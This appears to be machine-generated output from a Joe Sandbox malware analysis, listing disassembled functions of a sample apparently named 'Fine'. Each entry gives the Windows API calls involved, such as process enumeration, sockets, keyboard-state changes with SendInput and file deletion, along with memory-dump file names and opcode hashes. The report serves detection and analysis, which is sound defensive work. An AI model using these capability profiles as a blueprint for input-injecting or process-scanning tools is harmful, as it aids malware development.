                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0022E797
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 0022E7BD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                                            • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 264fce59554b006b41777baa519ab1f5847d9d71d60a21c83fc1d764eeb1bbb6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef0db6e7eb88daa6ec409d1e418436b67b9d2265d35816d8b4efc756fa83355f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 264fce59554b006b41777baa519ab1f5847d9d71d60a21c83fc1d764eeb1bbb6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80E02BB1D31A35BBDF355A606C48E7972186F22700B170598FC06F6140EBB4CDA89664
                                                                                                                                                                                                                                                                                                                            Function 0023096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c5af6d40dc21c88b1d7101ab2cb3dcee2025b0436bc9e3aa469eb2b30f24ae43
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ec973b843810826a0136e6dfdf4cdba579db2bdd57c84309e455fd870a89f7e4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5af6d40dc21c88b1d7101ab2cb3dcee2025b0436bc9e3aa469eb2b30f24ae43
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23C14CB5A1020AEFDB04CF94C8A4EAEB7B5FF48708F108599E505DB251D771EE51CBA0
                                                                                                                                                                                                                                                                                                                            Function 002041F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0fd46ac390d460ca406ac434c6c958cf7a4848f304db1cbf8300dde2569cb85a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64A17CB1A203869FDB11EF18C8917AEBBE5EF51310F2481ADEA559B2C3C3749D61CB50
                                                                                                                                                                                                                                                                                                                            Function 00230D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00270BD4,?), ref: 00230EE0
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00270BD4,?), ref: 00230EF8
                                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0026DCE0,000000FF,?,00000000,00000800,00000000,?,00270BD4,?), ref: 00230F1D
                                                                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00230F3E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9f6eecbac36c35db408e61072e004329257031018450d564a0fa9d62d2a42f69
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 769c7c2bb84b1ba9b68e664142b466ea4e6b28ceb14d75653cf84398ce35c510
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6eecbac36c35db408e61072e004329257031018450d564a0fa9d62d2a42f69
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8812B75A10109EFCB04DF94C994EEEB7B9FF89315F204598E506AB250DB71AE06CB60
                                                                                                                                                                                                                                                                                                                            Function 0025B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0025B10C
                                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0025B11A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0025B1FC
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025B20B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00214D73,?), ref: 001EE395
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ce6aa88771efc60201e2d1a647112e647cb58f9bf9c53dd901f2824154d74e9e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6cb8ccda856f0d8023815dbc8de6d0ff768ea4471d96bc8f3456f1e2332acdde
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce6aa88771efc60201e2d1a647112e647cb58f9bf9c53dd901f2824154d74e9e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61515A71908701AFC710EF24C886A5FBBE8FF99754F40491EF98997291EB70D904CB92
                                                                                                                                                                                                                                                                                                                            Function 00211711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4fabd8b286bc776652d4c7d2821e4706da3b89eaaa1567e0138bd05217a4e593
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 138736fa07900e6eff4218a2213b0a84935af9980550378165d4d25ed0ffc7a7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fabd8b286bc776652d4c7d2821e4706da3b89eaaa1567e0138bd05217a4e593
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D418031630105ABFB207FB99C45AFE76E5DF61330F154225F614C62E2DBB048F24651
                                                                                                                                                                                                                                                                                                                            Function 00252533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 0025255A
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00252568
                                                                                                                                                                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002525E7
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 002525F1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b8353e182ce82348cc5840c0c5a20d4c0b2c365517a93884c1898545a8b2ee03
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8cd1921a22c9e5edb22c4d703cd5e8c463bba60100bea54a9ff3f3e680394106
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8353e182ce82348cc5840c0c5a20d4c0b2c365517a93884c1898545a8b2ee03
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4941F435A00201AFE720AF24C886F2A77E4AF55718F54C448F91A8F3D2D7B2ED46CB90
                                                                                                                                                                                                                                                                                                                            Function 00266CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00266D1A
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00266D4D
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00266DBA
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 766b2745d315f75d8e49168fa3805db7c0c3d411e44e36ea8a27191fdcbd6dbf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 03bdb4d48bd1d654229fcef9e371adb3b3e6ca79f481851009bf2a65aa380920
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 766b2745d315f75d8e49168fa3805db7c0c3d411e44e36ea8a27191fdcbd6dbf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7515174A1020AEFCF14DF68D8889AE7BB6FF45360F208159F9159B290D771ED91CB90
                                                                                                                                                                                                                                                                                                                            Function 0020B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 19b91bf3d4df9ca4e1e6914672ae2cd515624f96af1f1b47c6ff9104f053a593
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 87df346dd5430c93a1d5e8b56c260b560af56fd2658a6657284ca7b665c56d5b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19b91bf3d4df9ca4e1e6914672ae2cd515624f96af1f1b47c6ff9104f053a593
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D641E971920704AFD735AF78CC45BAABBEDEB84710F10852AF111DB2E2D77199618B80
                                                                                                                                                                                                                                                                                                                            Function 0024611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002461C8
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 002461EE
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00246213
                                                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0024623F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c874c9be42340da994466cce1394f2b4bf84247b89b138d3d7babc3019156417
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9ffc5393dcba36cfb6670cbb775274a92d23de36251139df1055420d49efb950
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c874c9be42340da994466cce1394f2b4bf84247b89b138d3d7babc3019156417
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB414935A00611DFCB14EF15C595A1ABBF2EF99710B198489EC4AAB362CB74FC01CF91
                                                                                                                                                                                                                                                                                                                            Function 0023B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0023B473
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0023B48F
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0023B4FD
                                                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0023B54F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: eb38d88857dffd0a3bf455479078e75a40e513ebd264c5fd60f026df76df88c4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 315872c76b50b3e6833998d786f5855f534733c259ef7fcfb0924aca06d9a1f2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb38d88857dffd0a3bf455479078e75a40e513ebd264c5fd60f026df76df88c4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB316DF0E603096EFF32CF25D8197FA7B75AB48310F44821AE796561D2C3B489618765
                                                                                                                                                                                                                                                                                                                            Function 0023B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0023B5B8
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0023B5D4
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0023B63B
                                                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0023B68D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4868f8ecff5ef4536e7167a0fddbba3b8786201e3d5b4a5b96f8578d9c05148f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6e44c902bf2d01e3341992c7a4abbe43f2961b1f5200919c5e901448e37a4e51
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4868f8ecff5ef4536e7167a0fddbba3b8786201e3d5b4a5b96f8578d9c05148f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E313FB0E2060D5EFF268F2588067FE7779AF88310F44422AE581461D2C7748A658F51
